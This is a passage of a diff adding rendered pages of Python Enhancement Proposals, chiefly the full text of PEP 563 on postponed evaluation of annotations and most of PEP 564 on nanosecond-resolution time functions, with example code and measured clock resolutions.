Source: https://github.com/python/peps/blob/main/peps/pep-0562.rst

+

Last modified: 2024-10-31 21:24:44 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0563/index.html b/pep-0563/index.html new file mode 100644 index 00000000000..1fe36250c14 --- /dev/null +++ b/pep-0563/index.html @@ -0,0 +1,780 @@ + + + + + + + + PEP 563 – Postponed Evaluation of Annotations | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 563 – Postponed Evaluation of Annotations

+
+
Author:
+
Łukasz Langa <lukasz at python.org>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
08-Sep-2017
+
Python-Version:
+
3.7
+
Post-History:
+
01-Nov-2017, 21-Nov-2017
+
Superseded-By:
+
649
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

PEP 3107 introduced syntax for function annotations, but the semantics +were deliberately left undefined. PEP 484 introduced a standard meaning +to annotations: type hints. PEP 526 defined variable annotations, +explicitly tying them with the type hinting use case.

+

This PEP proposes changing function annotations and variable annotations +so that they are no longer evaluated at function definition time. +Instead, they are preserved in __annotations__ in string form.

+

This change is being introduced gradually, starting with a +__future__ import in Python 3.7.

+
+
+

Rationale and Goals

+

PEP 3107 added support for arbitrary annotations on parts of a function +definition. Just like default values, annotations are evaluated at +function definition time. This creates a number of issues for the type +hinting use case:

+
    +
  • forward references: when a type hint contains names that have not been +defined yet, that definition needs to be expressed as a string +literal;
  • +
  • type hints are executed at module import time, which is not +computationally free.
  • +
+

Postponing the evaluation of annotations solves both problems. +NOTE: PEP 649 proposes an alternative solution to the above issues, +putting this PEP in danger of being superseded.

+
+

Non-goals

+

Just like in PEP 484 and PEP 526, it should be emphasized that Python +will remain a dynamically typed language, and the authors have no desire +to ever make type hints mandatory, even by convention.

+

This PEP is meant to solve the problem of forward references in type +annotations. There are still cases outside of annotations where +forward references will require usage of string literals. Those are +listed in a later section of this document.

+

Annotations without forced evaluation enable opportunities to improve +the syntax of type hints. This idea will require its own separate PEP +and is not discussed further in this document.

+
+
+

Non-typing usage of annotations

+

While annotations are still available for arbitrary use besides type +checking, it is worth mentioning that the design of this PEP, as well +as its precursors (PEP 484 and PEP 526), is predominantly motivated by +the type hinting use case.

+

In Python 3.8 PEP 484 will graduate from provisional status. Other +enhancements to the Python programming language like PEP 544, PEP 557, +or PEP 560, are already being built on this basis as they depend on +type annotations and the typing module as defined by PEP 484. +In fact, the reason PEP 484 is staying provisional in Python 3.7 is to +enable rapid evolution for another release cycle that some of the +aforementioned enhancements require.

+

With this in mind, uses for annotations incompatible with the +aforementioned PEPs should be considered deprecated.

+
+
+
+

Implementation

+

With this PEP, function and variable annotations will no longer be +evaluated at definition time. Instead, a string form will be preserved +in the respective __annotations__ dictionary. Static type checkers +will see no difference in behavior, whereas tools using annotations at +runtime will have to perform postponed evaluation.

+

The string form is obtained from the AST during the compilation step, +which means that the string form might not preserve the exact formatting +of the source. Note: if an annotation was a string literal already, it +will still be wrapped in a string.

+

Annotations need to be syntactically valid Python expressions, also when +passed as literal strings (i.e. compile(literal, '', 'eval')). +Annotations can only use names present in the module scope as postponed +evaluation using local names is not reliable (with the sole exception of +class-level names resolved by typing.get_type_hints()).

+

Note that as per PEP 526, local variable annotations are not evaluated +at all since they are not accessible outside of the function’s closure.

+
+

Enabling the future behavior in Python 3.7

+

The functionality described above can be enabled starting from Python +3.7 using the following special import:

+
from __future__ import annotations
+
+
+

A reference implementation of this functionality is available +on GitHub.

+
+
+
+

Resolving Type Hints at Runtime

+

To resolve an annotation at runtime from its string form to the result +of the enclosed expression, user code needs to evaluate the string.

+

For code that uses type hints, the +typing.get_type_hints(obj, globalns=None, localns=None) function +correctly evaluates expressions back from its string form. Note that +all valid code currently using __annotations__ should already be +doing that since a type annotation can be expressed as a string literal.

+

For code which uses annotations for other purposes, a regular +eval(ann, globals, locals) call is enough to resolve the +annotation.

+

In both cases it’s important to consider how globals and locals affect +the postponed evaluation. An annotation is no longer evaluated at the +time of definition and, more importantly, in the same scope where it +was defined. Consequently, using local state in annotations is no +longer possible in general. As for globals, the module where the +annotation was defined is the correct context for postponed evaluation.

+

The get_type_hints() function automatically resolves the correct +value of globalns for functions and classes. It also automatically +provides the correct localns for classes.

+

When running eval(), +the value of globals can be gathered in the following way:

+
    +
  • function objects hold a reference to their respective globals in an +attribute called __globals__;
  • +
  • classes hold the name of the module they were defined in, this can be +used to retrieve the respective globals:
    cls_globals = vars(sys.modules[SomeClass.__module__])
    +
    +
    +

    Note that this needs to be repeated for base classes to evaluate all +__annotations__.

    +
  • +
  • modules should use their own __dict__.
  • +
+

The value of localns cannot be reliably retrieved for functions +because in all likelihood the stack frame at the time of the call no +longer exists.

+

For classes, localns can be composed by chaining vars of the given +class and its base classes (in the method resolution order). Since slots +can only be filled after the class was defined, we don’t need to consult +them for this purpose.

+
+

Runtime annotation resolution and class decorators

+

Metaclasses and class decorators that need to resolve annotations for +the current class will fail for annotations that use the name of the +current class. Example:

+
def class_decorator(cls):
+    annotations = get_type_hints(cls)  # raises NameError on 'C'
+    print(f'Annotations for {cls}: {annotations}')
+    return cls
+
+@class_decorator
+class C:
+    singleton: 'C' = None
+
+
+

This was already true before this PEP. The class decorator acts on +the class before it’s assigned a name in the current definition scope.

+
+
+

Runtime annotation resolution and TYPE_CHECKING

+

Sometimes there’s code that must be seen by a type checker but should +not be executed. For such situations the typing module defines a +constant, TYPE_CHECKING, that is considered True during type +checking but False at runtime. Example:

+
import typing
+
+if typing.TYPE_CHECKING:
+    import expensive_mod
+
+def a_func(arg: expensive_mod.SomeClass) -> None:
+    a_var: expensive_mod.SomeClass = arg
+    ...
+
+
+

This approach is also useful when handling import cycles.

+

Trying to resolve annotations of a_func at runtime using +typing.get_type_hints() will fail since the name expensive_mod +is not defined (TYPE_CHECKING variable being False at runtime). +This was already true before this PEP.

+
+
+
+

Backwards Compatibility

+

This is a backwards incompatible change. Applications depending on +arbitrary objects to be directly present in annotations will break +if they are not using typing.get_type_hints() or eval().

+

Annotations that depend on locals at the time of the function +definition will not be resolvable later. Example:

+
def generate():
+    A = Optional[int]
+    class C:
+        field: A = 1
+        def method(self, arg: A) -> None: ...
+    return C
+X = generate()
+
+
+

Trying to resolve annotations of X later by using +get_type_hints(X) will fail because A and its enclosing scope no +longer exists. Python will make no attempt to disallow such annotations +since they can often still be successfully statically analyzed, which is +the predominant use case for annotations.

+

Annotations using nested classes and their respective state are still +valid. They can use local names or the fully qualified name. Example:

+
class C:
+    field = 'c_field'
+    def method(self) -> C.field:  # this is OK
+        ...
+
+    def method(self) -> field:  # this is OK
+        ...
+
+    def method(self) -> C.D:  # this is OK
+        ...
+
+    def method(self) -> D:  # this is OK
+        ...
+
+    class D:
+        field2 = 'd_field'
+        def method(self) -> C.D.field2:  # this is OK
+            ...
+
+        def method(self) -> D.field2:  # this FAILS, class D is local to C
+            ...                        # and is therefore only available
+                                       # as C.D. This was already true
+                                       # before the PEP.
+
+        def method(self) -> field2:  # this is OK
+            ...
+
+        def method(self) -> field:  # this FAILS, field is local to C and
+                                    # is therefore not visible to D unless
+                                    # accessed as C.field. This was already
+                                    # true before the PEP.
+
+
+

In the presence of an annotation that isn’t a syntactically valid +expression, SyntaxError is raised at compile time. However, since names +aren’t resolved at that time, no attempt is made to validate whether +used names are correct or not.

+
+

Deprecation policy

+

Starting with Python 3.7, a __future__ import is required to use the +described functionality. No warnings are raised.

+

NOTE: Whether this will eventually become the default behavior is currently unclear +pending decision on PEP 649. In any case, use of annotations that depend upon +their eager evaluation is incompatible with both proposals and is no longer +supported.

+
+
+
+

Forward References

+

Deliberately using a name before it was defined in the module is called +a forward reference. For the purpose of this section, we’ll call +any name imported or defined within a if TYPE_CHECKING: block +a forward reference, too.

+

This PEP addresses the issue of forward references in type annotations. +The use of string literals will no longer be required in this case. +However, there are APIs in the typing module that use other syntactic +constructs of the language, and those will still require working around +forward references with string literals. The list includes:

+
    +
  • type definitions:
    T = TypeVar('T', bound='<type>')
    +UserId = NewType('UserId', '<type>')
    +Employee = NamedTuple('Employee', [('name', '<type>'), ('id', '<type>')])
    +
    +
    +
  • +
  • aliases:
    Alias = Optional['<type>']
    +AnotherAlias = Union['<type>', '<type>']
    +YetAnotherAlias = '<type>'
    +
    +
    +
  • +
  • casting:
    cast('<type>', value)
    +
    +
    +
  • +
  • base classes:
    class C(Tuple['<type>', '<type>']): ...
    +
    +
    +
  • +
+

Depending on the specific case, some of the cases listed above might be +worked around by placing the usage in a if TYPE_CHECKING: block. +This will not work for any code that needs to be available at runtime, +notably for base classes and casting. For named tuples, using the new +class definition syntax introduced in Python 3.6 solves the issue.

+

In general, fixing the issue for all forward references requires +changing how module instantiation is performed in Python, from the +current single-pass top-down model. This would be a major change in the +language and is out of scope for this PEP.

+
+
+

Rejected Ideas

+
+

Keeping the ability to use function local state when defining annotations

+

With postponed evaluation, this would require keeping a reference to +the frame in which an annotation got created. This could be achieved +for example by storing all annotations as lambdas instead of strings.

+

This would be prohibitively expensive for highly annotated code as the +frames would keep all their objects alive. That includes predominantly +objects that won’t ever be accessed again.

+

To be able to address class-level scope, the lambda approach would +require a new kind of cell in the interpreter. This would proliferate +the number of types that can appear in __annotations__, as well as +wouldn’t be as introspectable as strings.

+

Note that in the case of nested classes, the functionality to get the +effective “globals” and “locals” at definition time is provided by +typing.get_type_hints().

+

If a function generates a class or a function with annotations that +have to use local variables, it can populate the given generated +object’s __annotations__ dictionary directly, without relying on +the compiler.

+
+
+

Disallowing local state usage for classes, too

+

This PEP originally proposed limiting names within annotations to only +allow names from the model-level scope, including for classes. The +author argued this makes name resolution unambiguous, including in cases +of conflicts between local names and module-level names.

+

This idea was ultimately rejected in case of classes. Instead, +typing.get_type_hints() got modified to populate the local namespace +correctly if class-level annotations are needed.

+

The reasons for rejecting the idea were that it goes against the +intuition of how scoping works in Python, and would break enough +existing type annotations to make the transition cumbersome. Finally, +local scope access is required for class decorators to be able to +evaluate type annotations. This is because class decorators are applied +before the class receives its name in the outer scope.

+
+
+

Introducing a new dictionary for the string literal form instead

+

Yury Selivanov shared the following idea:

+
    +
  1. Add a new special attribute to functions: __annotations_text__.
  2. +
  3. Make __annotations__ a lazy dynamic mapping, evaluating +expressions from the corresponding key in __annotations_text__ +just-in-time.
  4. +
+

This idea is supposed to solve the backwards compatibility issue, +removing the need for a new __future__ import. Sadly, this is not +enough. Postponed evaluation changes which state the annotation has +access to. While postponed evaluation fixes the forward reference +problem, it also makes it impossible to access function-level locals +anymore. This alone is a source of backwards incompatibility which +justifies a deprecation period.

+

A __future__ import is an obvious and explicit indicator of opting +in for the new functionality. It also makes it trivial for external +tools to recognize the difference between a Python files using the old +or the new approach. In the former case, that tool would recognize that +local state access is allowed, whereas in the latter case it would +recognize that forward references are allowed.

+

Finally, just-in-time evaluation in __annotations__ is an +unnecessary step if get_type_hints() is used later.

+
+
+

Dropping annotations with -O

+

There are two reasons this is not satisfying for the purpose of this +PEP.

+

First, this only addresses runtime cost, not forward references, those +still cannot be safely used in source code. A library maintainer would +never be able to use forward references since that would force the +library users to use this new hypothetical -O switch.

+

Second, this throws the baby out with the bath water. Now no runtime +annotation use can be performed. PEP 557 is one example of a recent +development where evaluating type annotations at runtime is useful.

+

All that being said, a granular -O option to drop annotations is +a possibility in the future, as it’s conceptually compatible with +existing -O behavior (dropping docstrings and assert statements). This +PEP does not invalidate the idea.

+
+
+

Passing string literals in annotations verbatim to __annotations__

+

This PEP originally suggested directly storing the contents of a string +literal under its respective key in __annotations__. This was +meant to simplify support for runtime type checkers.

+

Mark Shannon pointed out this idea was flawed since it wasn’t handling +situations where strings are only part of a type annotation.

+

The inconsistency of it was always apparent but given that it doesn’t +fully prevent cases of double-wrapping strings anyway, it is not worth +it.

+
+
+

Making the name of the future import more verbose

+

Instead of requiring the following import:

+
from __future__ import annotations
+
+
+

the PEP could call the feature more explicitly, for example +string_annotations, stringify_annotations, +annotation_strings, annotations_as_strings, lazy_annotations, +static_annotations, etc.

+

The problem with those names is that they are very verbose. Each of +them besides lazy_annotations would constitute the longest future +feature name in Python. They are long to type and harder to remember +than the single-word form.

+

There is precedence of a future import name that sounds overly generic +but in practice was obvious to users as to what it does:

+
from __future__ import division
+
+
+
+
+
+

Prior discussion

+
+

In PEP 484

+

The forward reference problem was discussed when PEP 484 was originally +drafted, leading to the following statement in the document:

+
+
A compromise is possible where a __future__ import could enable +turning all annotations in a given module into string literals, as +follows:
from __future__ import annotations
+
+class ImSet:
+    def add(self, a: ImSet) -> List[ImSet]: ...
+
+assert ImSet.add.__annotations__ == {
+    'a': 'ImSet', 'return': 'List[ImSet]'
+}
+
+
+

Such a __future__ import statement may be proposed in a separate +PEP.

+
+
+
+

python/typing#400

+

The problem was discussed at length on the typing module’s GitHub +project, under Issue 400. +The problem statement there includes critique of generic types requiring +imports from typing. This tends to be confusing to +beginners:

+
+
Why this:
from typing import List, Set
+def dir(o: object = ...) -> List[str]: ...
+def add_friends(friends: Set[Friend]) -> None: ...
+
+
+

But not this:

+
def dir(o: object = ...) -> list[str]: ...
+def add_friends(friends: set[Friend]) -> None ...
+
+
+

Why this:

+
up_to_ten = list(range(10))
+friends = set()
+
+
+

But not this:

+
from typing import List, Set
+up_to_ten = List[int](range(10))
+friends = Set[Friend]()
+
+
+
+

While typing usability is an interesting problem, it is out of scope +of this PEP. Specifically, any extensions of the typing syntax +standardized in PEP 484 will require their own respective PEPs and +approval.

+

Issue 400 ultimately suggests postponing evaluation of annotations and +keeping them as strings in __annotations__, just like this PEP +specifies. This idea was received well. Ivan Levkivskyi supported +using the __future__ import and suggested unparsing the AST in +compile.c. Jukka Lehtosalo pointed out that there are some cases +of forward references where types are used outside of annotations and +postponed evaluation will not help those. For those cases using the +string literal notation would still be required. Those cases are +discussed briefly in the “Forward References” section of this PEP.

+

The biggest controversy on the issue was Guido van Rossum’s concern +that untokenizing annotation expressions back to their string form has +no precedent in the Python programming language and feels like a hacky +workaround. He said:

+
+
One thing that comes to mind is that it’s a very random change to +the language. It might be useful to have a more compact way to +indicate deferred execution of expressions (using less syntax than +lambda:). But why would the use case of type annotations be so +all-important to change the language to do it there first (rather +than proposing a more general solution), given that there’s already +a solution for this particular use case that requires very minimal +syntax?
+

Eventually, Ethan Smith and schollii voiced that feedback gathered +during PyCon US suggests that the state of forward references needs +fixing. Guido van Rossum suggested coming back to the __future__ +idea, pointing out that to prevent abuse, it’s important for the +annotations to be kept both syntactically valid and evaluating correctly +at runtime.

+
+
+

First draft discussion on python-ideas

+

Discussion happened largely in two threads, the original announcement +and a follow-up called PEP 563 and expensive backwards compatibility.

+

The PEP received rather warm feedback (4 strongly in favor, +2 in favor with concerns, 2 against). The biggest voice of concern on +the former thread being Steven D’Aprano’s review stating that the +problem definition of the PEP doesn’t justify breaking backwards +compatibility. In this response Steven seemed mostly concerned about +Python no longer supporting evaluation of annotations that depended on +local function/class state.

+

A few people voiced concerns that there are libraries using annotations +for non-typing purposes. However, none of the named libraries would be +invalidated by this PEP. They do require adapting to the new +requirement to call eval() on the annotation with the correct +globals and locals set.

+

This detail about globals and locals having to be correct was +picked up by a number of commenters. Alyssa (Nick) Coghlan benchmarked turning +annotations into lambdas instead of strings, sadly this proved to be +much slower at runtime than the current situation.

+

The latter thread was started by Jim J. Jewett who stressed that +the ability to properly evaluate annotations is an important requirement +and backwards compatibility in that regard is valuable. After some +discussion he admitted that side effects in annotations are a code smell +and modal support to either perform or not perform evaluation is +a messy solution. His biggest concern remained loss of functionality +stemming from the evaluation restrictions on global and local scope.

+

Alyssa Coghlan pointed out that some of those evaluation restrictions from +the PEP could be lifted by a clever implementation of an evaluation +helper, which could solve self-referencing classes even in the form of a +class decorator. She suggested the PEP should provide this helper +function in the standard library.

+
+
+

Second draft discussion on python-dev

+

Discussion happened mainly in the announcement thread, +followed by a brief discussion under Mark Shannon’s post.

+

Steven D’Aprano was concerned whether it’s acceptable for typos to be +allowed in annotations after the change proposed by the PEP. Brett +Cannon responded that type checkers and other static analyzers (like +linters or programming text editors) will catch this type of error. +Jukka Lehtosalo added that this situation is analogous to how names in +function bodies are not resolved until the function is called.

+

A major topic of discussion was Alyssa Coghlan’s suggestion to store +annotations in “thunk form”, in other words as a specialized lambda +which would be able to access class-level scope (and allow for scope +customization at call time). He presented a possible design for it +(indirect attribute cells). +This was later seen as equivalent to “special forms” in Lisp. Guido van +Rossum expressed worry that this sort of feature cannot be safely +implemented in twelve weeks (i.e. in time before the Python 3.7 beta +freeze).

+

After a while it became clear that the point of division between +supporters of the string form vs. supporters of the thunk form is +actually about whether annotations should be perceived as a general +syntactic element vs. something tied to the type checking use case.

+

Finally, Guido van Rossum declared he’s rejecting the thunk idea +based on the fact that it would require a new building block in the +interpreter. This block would be exposed in annotations, multiplying +possible types of values stored in __annotations__ (arbitrary +objects, strings, and now thunks). Moreover, thunks aren’t as +introspectable as strings. Most importantly, Guido van Rossum +explicitly stated interest in gradually restricting the use of +annotations to static typing (with an optional runtime component).

+

Alyssa Coghlan got convinced to PEP 563, too, promptly beginning +the mandatory bike shedding session on the name of the __future__ +import. Many debaters agreed that annotations seems like +an overly broad name for the feature name. Guido van Rossum briefly +decided to call it string_annotations but then changed his mind, +arguing that division is a precedent of a broad name with a clear +meaning.

+

The final improvement to the PEP suggested in the discussion by Mark +Shannon was the rejection of the temptation to pass string literals +through to __annotations__ verbatim.

+

A side-thread of discussion started around the runtime penalty of +static typing, with topic like the import time of the typing +module (which is comparable to re without dependencies, and +three times as heavy as re when counting dependencies).

+
+
+
+

Acknowledgements

+

This document could not be completed without valuable input, +encouragement and advice from Guido van Rossum, Jukka Lehtosalo, and +Ivan Levkivskyi.

+

The implementation was thoroughly reviewed by Serhiy Storchaka who +found all sorts of issues, including bugs, bad readability, and +performance problems.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0563.rst

+

Last modified: 2024-03-24 01:43:58 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0564/index.html b/pep-0564/index.html new file mode 100644 index 00000000000..1521d047661 --- /dev/null +++ b/pep-0564/index.html @@ -0,0 +1,623 @@ + + + + + + + + PEP 564 – Add new time functions with nanosecond resolution | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 564 – Add new time functions with nanosecond resolution

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
16-Oct-2017
+
Python-Version:
+
3.7
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Add six new “nanosecond” variants of existing functions to the time +module: clock_gettime_ns(), clock_settime_ns(), +monotonic_ns(), perf_counter_ns(), process_time_ns() and +time_ns(). While similar to the existing functions without the +_ns suffix, they provide nanosecond resolution: they return a number of +nanoseconds as a Python int.

+

The time.time_ns() resolution is 3 times better than the time.time() +resolution on Linux and Windows.

+
+
+

Rationale

+
+

Float type limited to 104 days

+

The clocks resolution of desktop and laptop computers is getting closer +to nanosecond resolution. More and more clocks have a frequency in MHz, +up to GHz for the CPU TSC clock.

+

The Python time.time() function returns the current time as a +floating-point number which is usually a 64-bit binary floating-point +number (in the IEEE 754 format).

+

The problem is that the float type starts to lose nanoseconds after 104 +days. Converting from nanoseconds (int) to seconds (float) and +then back to nanoseconds (int) to check if conversions lose +precision:

+
# no precision loss
+>>> x = 2 ** 52 + 1; int(float(x * 1e-9) * 1e9) - x
+0
+# precision loss! (1 nanosecond)
+>>> x = 2 ** 53 + 1; int(float(x * 1e-9) * 1e9) - x
+-1
+>>> print(datetime.timedelta(seconds=2 ** 53 / 1e9))
+104 days, 5:59:59.254741
+
+
+

time.time() returns seconds elapsed since the UNIX epoch: January +1st, 1970. This function hasn’t had nanosecond precision since May 1970 +(47 years ago):

+
>>> import datetime
+>>> unix_epoch = datetime.datetime(1970, 1, 1)
+>>> print(unix_epoch + datetime.timedelta(seconds=2**53 / 1e9))
+1970-04-15 05:59:59.254741
+
+
+
+
+

Previous rejected PEP

+

Five years ago, the PEP 410 proposed a large and complex change in all +Python functions returning time to support nanosecond resolution using +the decimal.Decimal type.

+

The PEP was rejected for different reasons:

+
    +
  • The idea of adding a new optional parameter to change the result type +was rejected. It’s an uncommon (and bad?) programming practice in +Python.
  • +
  • It was not clear if hardware clocks really had a resolution of 1 +nanosecond, or if that made sense at the Python level.
  • +
  • The decimal.Decimal type is uncommon in Python and so requires +to adapt code to handle it.
  • +
+
+
+

Issues caused by precision loss

+
+

Example 1: measure time delta in long-running process

+

A server is running for longer than 104 days. A clock is read before and +after running a function to measure its performance to detect +performance issues at runtime. Such benchmark only loses precision +because of the float type used by clocks, not because of the clock +resolution.

+

On Python microbenchmarks, it is common to see function calls taking +less than 100 ns. A difference of a few nanoseconds might become +significant.

+
+
+

Example 2: compare times with different resolution

+

Two programs “A” and “B” are running on the same system and use the system +clock. The program A reads the system clock with nanosecond resolution +and writes a timestamp with nanosecond resolution. The program B reads +the timestamp with nanosecond resolution, but compares it to the system +clock read with a worse resolution. To simplify the example, let’s say +that B reads the clock with second resolution. If that case, there is a +window of 1 second while the program B can see the timestamp written by A +as “in the future”.

+

Nowadays, more and more databases and filesystems support storing times +with nanosecond resolution.

+
+

Note

+

This issue was already fixed for file modification time by adding the +st_mtime_ns field to the os.stat() result, and by accepting +nanoseconds in os.utime(). This PEP proposes to generalize the +fix.

+
+
+
+
+

CPython enhancements of the last 5 years

+

Since the PEP 410 was rejected:

+
    +
  • The os.stat_result structure got 3 new fields for timestamps as +nanoseconds (Python int): st_atime_ns, st_ctime_ns +and st_mtime_ns.
  • +
  • The PEP 418 was accepted, Python 3.3 got 3 new clocks: +time.monotonic(), time.perf_counter() and +time.process_time().
  • +
  • The CPython private “pytime” C API handling time now uses a new +_PyTime_t type: simple 64-bit signed integer (C int64_t). +The _PyTime_t unit is an implementation detail and not part of the +API. The unit is currently 1 nanosecond.
  • +
+
+
+

Existing Python APIs using nanoseconds as int

+

The os.stat_result structure has 3 fields for timestamps as +nanoseconds (int): st_atime_ns, st_ctime_ns and +st_mtime_ns.

+

The ns parameter of the os.utime() function accepts a +(atime_ns: int, mtime_ns: int) tuple: nanoseconds.

+
+
+
+

Changes

+
+

New functions

+

This PEP adds six new functions to the time module:

+
    +
  • time.clock_gettime_ns(clock_id)
  • +
  • time.clock_settime_ns(clock_id, time: int)
  • +
  • time.monotonic_ns()
  • +
  • time.perf_counter_ns()
  • +
  • time.process_time_ns()
  • +
  • time.time_ns()
  • +
+

These functions are similar to the version without the _ns suffix, +but return a number of nanoseconds as a Python int.

+

For example, time.monotonic_ns() == int(time.monotonic() * 1e9) if +monotonic() value is small enough to not lose precision.

+

These functions are needed because they may return “large” timestamps, +like time.time() which uses the UNIX epoch as reference, and so their +float-returning variants are likely to lose precision at the nanosecond +resolution.

+
+
+

Unchanged functions

+

Since the time.clock() function was deprecated in Python 3.3, no +time.clock_ns() is added.

+

Python has other time-returning functions. No nanosecond variant is +proposed for these other functions, either because their internal +resolution is greater or equal to 1 us, or because their maximum value +is small enough to not lose precision. For example, the maximum value of +time.clock_getres() should be 1 second.

+

Examples of unchanged functions:

+
    +
  • os module: sched_rr_get_interval(), times(), wait3() +and wait4()
  • +
  • resource module: ru_utime and ru_stime fields of +getrusage()
  • +
  • signal module: getitimer(), setitimer()
  • +
  • time module: clock_getres()
  • +
+

See also the Annex: Clocks Resolution in Python.

+

A new nanosecond-returning flavor of these functions may be added later +if an operating system exposes new functions providing better resolution.

+
+
+
+

Alternatives and discussion

+
+

Sub-nanosecond resolution

+

time.time_ns() API is not theoretically future-proof: if clock +resolutions continue to increase below the nanosecond level, new Python +functions may be needed.

+

In practice, the 1 nanosecond resolution is currently enough for all +structures returned by all common operating systems functions.

+

Hardware clocks with a resolution better than 1 nanosecond already +exist. For example, the frequency of a CPU TSC clock is the CPU base +frequency: the resolution is around 0.3 ns for a CPU running at 3 +GHz. Users who have access to such hardware and really need +sub-nanosecond resolution can however extend Python for their needs. +Such a rare use case doesn’t justify to design the Python standard library +to support sub-nanosecond resolution.

+

For the CPython implementation, nanosecond resolution is convenient: the +standard and well supported int64_t type can be used to store a +nanosecond-precise timestamp. It supports a timespan of -292 years +to +292 years. Using the UNIX epoch as reference, it therefore supports +representing times since year 1677 to year 2262:

+
>>> 1970 - 2 ** 63 / (10 ** 9 * 3600 * 24 * 365.25)
+1677.728976954687
+>>> 1970 + 2 ** 63 / (10 ** 9 * 3600 * 24 * 365.25)
+2262.271023045313
+
+
+
+
+

Modifying time.time() result type

+

It was proposed to modify time.time() to return a different number +type with better precision.

+

The PEP 410 proposed to return decimal.Decimal which already exists and +supports arbitrary precision, but it was rejected. Apart from +decimal.Decimal, no portable real number type with better precision +is currently available in Python.

+

Changing the built-in Python float type is out of the scope of this +PEP.

+

Moreover, changing existing functions to return a new type introduces a +risk of breaking the backward compatibility even if the new type is +designed carefully.

+
+
+

Different types

+

Many ideas of new types were proposed to support larger or arbitrary +precision: fractions, structures or 2-tuple using integers, +fixed-point number, etc.

+

See also the PEP 410 for a previous long discussion on other types.

+

Adding a new type requires more effort to support it, than reusing +the existing int type. The standard library, third party code and +applications would have to be modified to support it.

+

The Python int type is well known, well supported, easy to +manipulate, and supports all arithmetic operations such as +dt = t2 - t1.

+

Moreover, taking/returning an integer number of nanoseconds is not a +new concept in Python, as witnessed by os.stat_result and +os.utime(ns=(atime_ns, mtime_ns)).

+
+

Note

+

If the Python float type becomes larger (e.g. decimal128 or +float128), the time.time() precision will increase as well.

+
+
+
+

Different API

+

The time.time(ns=False) API was proposed to avoid adding new +functions. It’s an uncommon (and bad?) programming practice in Python to +change the result type depending on a parameter.

+

Different options were proposed to allow the user to choose the time +resolution. If each Python module uses a different resolution, it can +become difficult to handle different resolutions, instead of just +seconds (time.time() returning float) and nanoseconds +(time.time_ns() returning int). Moreover, as written above, +there is no need for resolution better than 1 nanosecond in practice in +the Python standard library.

+
+
+

A new module

+

It was proposed to add a new time_ns module containing the following +functions:

+
    +
  • time_ns.clock_gettime(clock_id)
  • +
  • time_ns.clock_settime(clock_id, time: int)
  • +
  • time_ns.monotonic()
  • +
  • time_ns.perf_counter()
  • +
  • time_ns.process_time()
  • +
  • time_ns.time()
  • +
+

The first question is whether the time_ns module should expose exactly +the same API (constants, functions, etc.) as the time module. It can be +painful to maintain two flavors of the time module. How are users use +supposed to make a choice between these two modules?

+

If tomorrow, other nanosecond variants are needed in the os module, +will we have to add a new os_ns module as well? There are functions +related to time in many modules: time, os, signal, +resource, select, etc.

+

Another idea is to add a time.ns submodule or a nested-namespace to +get the time.ns.time() syntax, but it suffers from the same issues.

+
+
+
+

Annex: Clocks Resolution in Python

+

This annex contains the resolution of clocks as measured in Python, and +not the resolution announced by the operating system or the resolution of +the internal structure used by the operating system.

+
+

Script

+

Example of script to measure the smallest difference between two +time.time() and time.time_ns() reads ignoring differences of zero:

+
import math
+import time
+
+LOOPS = 10 ** 6
+
+print("time.time_ns(): %s" % time.time_ns())
+print("time.time(): %s" % time.time())
+
+min_dt = [abs(time.time_ns() - time.time_ns())
+          for _ in range(LOOPS)]
+min_dt = min(filter(bool, min_dt))
+print("min time_ns() delta: %s ns" % min_dt)
+
+min_dt = [abs(time.time() - time.time())
+          for _ in range(LOOPS)]
+min_dt = min(filter(bool, min_dt))
+print("min time() delta: %s ns" % math.ceil(min_dt * 1e9))
+
+
+
+
+

Linux

+

Clocks resolution measured in Python on Fedora 26 (kernel 4.12):

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
FunctionResolution
clock()1 us
monotonic()81 ns
monotonic_ns()84 ns
perf_counter()82 ns
perf_counter_ns()84 ns
process_time()2 ns
process_time_ns()1 ns
resource.getrusage()1 us
time()239 ns
time_ns()84 ns
times().elapsed10 ms
times().user10 ms
+

Notes on resolutions:

+
    +
  • clock() frequency is CLOCKS_PER_SECOND which is 1,000,000 Hz +(1 MHz): resolution of 1 us.
  • +
  • times() frequency is os.sysconf("SC_CLK_TCK") (or the HZ +constant) which is equal to 100 Hz: resolution of 10 ms.
  • +
  • resource.getrusage(), os.wait3() and os.wait4() use the +ru_usage structure. The type of the ru_usage.ru_utime and +ru_usage.ru_stime fields is the timeval structure which has a +resolution of 1 us.
  • +
+
+
+

Windows

+

Clocks resolution measured in Python on Windows 8.1:

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
FunctionResolution
monotonic()15 ms
monotonic_ns()15 ms
perf_counter()100 ns
perf_counter_ns()100 ns
process_time()15.6 ms
process_time_ns()15.6 ms
time()894.1 us
time_ns()318 us
+

The frequency of perf_counter() and perf_counter_ns() comes from +QueryPerformanceFrequency(). The frequency is usually 10 MHz: resolution of +100 ns. In old Windows versions, the frequency was sometimes 3,579,545 Hz (3.6 +MHz): resolution of 279 ns.

+
+
+

Analysis

+

The resolution of time.time_ns() is much better than +time.time(): 84 ns (2.8x better) vs 239 ns on Linux and 318 us +(2.8x better) vs 894 us on Windows. The time.time() resolution will +only become larger (worse) as years pass since every day adds +86,400,000,000,000 nanoseconds to the system clock, which increases the +precision loss.

+

